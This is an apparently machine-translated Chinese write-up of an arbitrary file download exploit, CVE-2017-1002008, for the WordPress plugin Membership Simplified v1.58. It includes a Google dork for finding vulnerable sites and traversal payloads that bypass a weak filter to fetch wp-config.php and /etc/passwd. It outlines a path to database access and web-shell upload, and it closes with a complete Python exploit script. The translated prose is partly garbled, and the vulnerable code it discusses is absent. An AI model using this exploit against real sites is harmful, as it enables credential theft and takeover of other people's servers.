今天我们将讨论在WordPress插件WordPress插件与重点会员简化v1.58作为这个剧本的创作时间不打补丁的扶贫开发实践。脆弱脚本如下:
CVE-ID:cve-2017-1002008
当然,也可以利用Google来找
inurl:/wp-content/plugins/membership-simplified-for-oap-members-only
问题
下面是上面脚本的一些问题:
①该脚本不检查有效登录WordPress的用户,也不保护自己免受直接访问-这使得它任意(不受限制)的访问
②4行的脚本允许任何人通过download_file参数调用文件下载。任何人都可以直接调用它的脚本。
③第5行是一个坏的企图保护自己从点斜线攻击。
④脚本的其余部分加载强制下载的内容配置
发展有效载荷
所以假设目标example.com运行插件;我们会首先考虑利用它作为:
http://example.com/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=../../../wp-config.php
然而,这将导致以下网址。
http://example.com/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=wp-config.php
正如你所看到的,这将给我们一个404,因为WP配置文件不在插件文件夹。这是因为第5行。当我们说这是在保护一个坏的企图让我们把字符串替换和修改我们的攻击点。
http://example.com/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././wp-config.php
这不是标准,但结果是字符串替换函数会在执行前为我们删除错误的比特。它传递一次之前传递给它下载字符串(感谢上帝为此)。用字符串替换函数删除红色部分时。
之后, 我们基于WordPress标准结构移动3个目录。我们不能强调在WordPress配置文件中包含的信息种类,攻击者可以进一步建模的威胁如下:
①使用配置文件中的数据库连接信息连接到WordPress数据库实例
②更改数据库中的用户密码
③登录到网站并上传一个web外壳,实现网站上的远程代码执行。
一个简单的开发已为此工程如下:
以上我们就了解如何发展这种简单的利用从咨询信息在Web攻击SlideShare–自动化从公告创造现实世界的攻击的文章了。
最后附上我们exp利用的脚本
import requests
import string
import random
from urlparse import urlparse
print "---------------------------------------------------------------------"
print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download
Discovery: Larry W. Cashdollar
Exploit Author: Munir Njiru
Website: https://www.alien-within.com
CVE-2017-1002008
CWE: 23
Reference URLs:
http://www.vapidlabs.com/advisory.php?v=187"
print "---------------------------------------------------------------------"
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
file_choice=raw_input ("
Please choose a number representing the file to attack:
1. Wordpress Config
2. Linux Passwd File
")
if file_choice == "1":
payload="..././..././..././wp-config.php"
elif file_choice == "2":
payload="..././..././..././..././..././..././..././..././etc/passwd"
else:
print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"
quit()
slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload
target=victim+slug
def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def checkPlugin():
pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
pluginExistence = pluginExists.status_code
if pluginExistence == 200:
print "
I can reach the target & it seems vulnerable, I will attempt the exploit
Running exploit..."
exploit()
else:
print "Target has a funny code & might not be vulnerable, I will now exit
"
quit()
def exploit():
getThatFile = requests.get(target)
fileState = getThatFile.status_code
breakApart=urlparse(victim)
extract_hostname=breakApart.netloc
randomDifferentiator=randomizeFile()
cleanName=str(randomDifferentiator)
if fileState == 200:
respFromThatFile = getThatFile.text
if file_choice == "1":
resultFile=extract_hostname+"_config_"+cleanName+".txt"
print resultFile
pwned=open(resultFile, 'w')
pwned.write(respFromThatFile)
pwned.close
print "Wordpress Config Written to "+resultFile
else:
resultFile=extract_hostname+"_passwd"+cleanName+".txt"
pwned=open(resultFile, 'w')
pwned.write(respFromThatFile)
pwned.close
print "Passwd File Written to "+resultFile
else:
print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with:
" +fileState
if __name__ == "__main__":
checkPlugin()
参考来源https://www.alien-within.com/wordpress-plugin-membership-simplified-v1-58-arbitrary-file-download
翻译:admin-神风